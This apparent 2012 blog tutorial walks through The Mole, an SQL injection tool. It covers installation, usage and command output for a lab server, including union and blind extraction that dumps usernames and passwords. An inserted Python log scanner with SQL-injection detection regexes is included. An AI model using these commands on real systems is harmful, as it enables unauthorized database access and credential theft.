300 Mode
Posted on 2012-10-10 00:25:53
Installing Mole
  $ sudo apt-get install python3 python3-lxml
  $ git clone git://git.code.sf.net/p/themole/code themole-code

Standard usage (the first quoted argument is the injection URL, the second is the keyword):
  # ./mole.py -u '注入地址' -n '关键字'

The keyword is a string that appears in the response to "and 1=1" but not in the response to "and 1=2"; that difference is how the tool tells a true condition from a false one.
For example:
  # ./mole.py -u 'http://192.168.1.41/?id=1' -n 'admin'
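As an added defender-side example (not from the original post and not part of The Mole), the following Python scans constructed web-server access-log lines for the request pattern the keyword mechanism above relies on: a paired "and 1=1" / "and 1=2" probe, quote-separator and comment-delimiter tries, UNION column-count probes and blind length guesses, and it reports sources whose 1=1 and 1=2 responses differed in size, which is the very signal the tool keys on. The log format, IP addresses and signature regexes are assumptions for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit
# Constructed sample access-log lines (not from the original post) that mimic the probing
# The Mole's output implies: the and 1=1 / and 1=2 pair, a quote-separator try, a UNION probe
# ending in the '#' comment delimiter and a blind length guess; the last line is benign traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Oct/2012:00:20:02 +0800] "GET /?id=1%20and%201=1 HTTP/1.1" 200 512
192.168.1.50 - - [10/Oct/2012:00:20:02 +0800] "GET /?id=1%20and%201=2 HTTP/1.1" 200 301
192.168.1.50 - - [10/Oct/2012:00:20:03 +0800] "GET /?id=1'%20and%201=1%23 HTTP/1.1" 200 301
192.168.1.50 - - [10/Oct/2012:00:20:04 +0800] "GET /?id=1%20union%20select%201,2,3%23 HTTP/1.1" 200 640
192.168.1.50 - - [10/Oct/2012:00:20:05 +0800] "GET /?id=1%20and%20length(database())%3E4 HTTP/1.1" 200 301
10.0.0.7 - - [10/Oct/2012:00:21:00 +0800] "GET /?id=7 HTTP/1.1" 200 530
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} (?P<size>\d+)')
SIGNATURES = {  # assumed signatures; tune them to the application's real parameter vocabulary
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*(?P<val>[12])\b", re.I),
    "union_probe": re.compile(r"\bunion\s+select\b", re.I),
    "comment_delim": re.compile(r"(#|--\s|/\*)\s*$"),
    "blind_length": re.compile(r"\b(length|ascii|substr(ing)?)\s*\(", re.I),
}

def decoded_query(target):
    # URL-decode so encoded spaces and the %23 comment delimiter are visible to the signatures
    return unquote_plus(urlsplit(target).query)

def classify(target):
    """Names of the signatures matched by one request target (empty list for benign requests)."""
    q = decoded_query(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(q))

def scan_log(text):
    """Per source IP: matched signatures, hit count and response size of the first 1=1 / 1=2 probes."""
    per_ip = defaultdict(lambda: {"tags": set(), "hits": 0, "bool_sizes": {}})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not (tags := classify(m["target"])):
            continue
        rec = per_ip[m["ip"]]
        rec["tags"].update(tags)
        rec["hits"] += 1
        if (bm := SIGNATURES["boolean_probe"].search(decoded_query(m["target"]))):
            rec["bool_sizes"].setdefault(bm["val"], int(m["size"]))  # first size seen per half
    return per_ip

def suspicious_sources(text, min_hits=2):
    """(ip, tags, oracle) per IP with >= min_hits matches; oracle: the 1=1 and 1=2 answers differed in size."""
    def oracle(s): return len(s) == 2 and s["1"] != s["2"]
    return [(ip, sorted(r["tags"]), oracle(r["bool_sizes"]))
            for ip, r in scan_log(text).items() if r["hits"] >= min_hits]
```

An oracle value of True is the finding that matters most: it means the application answered the two halves of the pair differently, so the parameter should be reviewed for unparameterized SQL regardless of whether the probing source is blocked.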

Option: columns
  #> columns test users
  +-------------------------+
  | Columns for table users |
  +-------------------------+
  | password                |
  | username                |
  +-------------------------+

Option: cookie
  #> cookie test='test'
  #> cookie
  test='test'

Option: dbinfo
  #> dbinfo
  User:      test@localhost
  Version:   5.1.58-1ubuntu1
  Database:  test

Option: headers
  #> headers set User-Agent 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1'
  #> headers
  Host -> 192.168.1.41
  Accept-Language -> en-us
  Accept-Encoding -> identity
  Keep-Alive -> 300
  User-Agent -> 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1'
  Connection -> keep-alive
  Cache-Control -> max-age=0

Option: mode
  #> mode union
  #> schemas
  [i] Trying injection using 0 parenthesis.
  [i] Trying separator: "'"
  [i] Trying separator: """
  [i] Trying separator: " "
  [+] Found separator: " "
  [i] Trying DBMS Mysql
  [+] Found DBMS: Mysql
  [i] Trying injection using 0 parenthesis.
  [i] Trying injection using comment: #
  [+] Found comment delimiter: "#"
  [+] Query columns count: 3
  [+] Trying finger 1/2
  [+] Injectable fields found: [1, 2, 3]
  [i] Trying to inject in field 1
  [+] Found injectable field: 1
  [+] Using string union technique.
  [+] Rows: 2
  [*] Dumped 2/2 rows.
  +--------------------+
  | Databases          |
  +--------------------+
  | information_schema |
  | test               |
  +--------------------+
  #> mode blind
  #> schemas
  [i] Trying injection using 0 parenthesis.
  [i] Trying separator: "'"
  [i] Trying separator: """
  [i] Trying separator: " "
  [+] Found separator: " "
  [i] Trying DBMS Mysql
  [+] Found DBMS: Mysql
  [+] Found row count: 2
  [+] Guessing length for the next 2 records.
  [+] Guessed length: 18
  information_schema
  [+] Guessed length: 4
  test
  +--------------------+
  | Databases          |
  +--------------------+
  | information_schema |
  | test               |
  +--------------------+

Option: query
  #> query test users id,username,password
  [+] Rows: 3
  [*] Dumped 3/3 rows.
  +----------------------------+
  | id | username  | password  |
  +----------------------------+
  | 1  | admin     | P455w0rd  |
  | 2  | dupuis    | dupuis123 |
  | 3  | balantino | 20111206  |
  +----------------------------+
  #> output plain
  #> query test users id,username,password
  [+] Rows: 3
  [*] Dumped 3/3 rows.
  id, username, password:
  1, admin, P455w0rd
  2, dupuis, dupuis123
  3, balantino, 20111206

Option: tables
  #> tables test
  [+] Rows: 1
  [*] Dumped 1/1 rows.
  +--------+
  | Tables |
  +--------+
  | users  |
  +--------+

The normal sequence of database operations
  #> schemas  # list the databases
  +-----------+
  | Databases |
  +-----------+
  | pentest   |
  +-----------+
  #> tables pentest  # list the tables of database pentest
  +--------+
  | Tables |
  +--------+
  | stuff  |
  | users  |
  +--------+
  #> columns pentest users   # list the columns of table users in pentest
  [+] Found row count: 3
  [+] Guessed length: 2
  id
  [+] Guessed length: 8
  username
  [+] Guessed length: 8
  password
  +-------------------------+
  | Columns for table users |
  +-------------------------+
  | id                      |
  | password                |
  | username                |
  +-------------------------+
  #> query pentest users password,username  # query the contents
  [+] Found row count: 2
  [+] Guessed length: 12
  admin~&admin
  [+] Guessed length: 12
  guest~&guest
  +---------------------+
  | password | username |
  +---------------------+
  | admin    | admin    |
  | guest    | guest    |
  +---------------------+
  #>



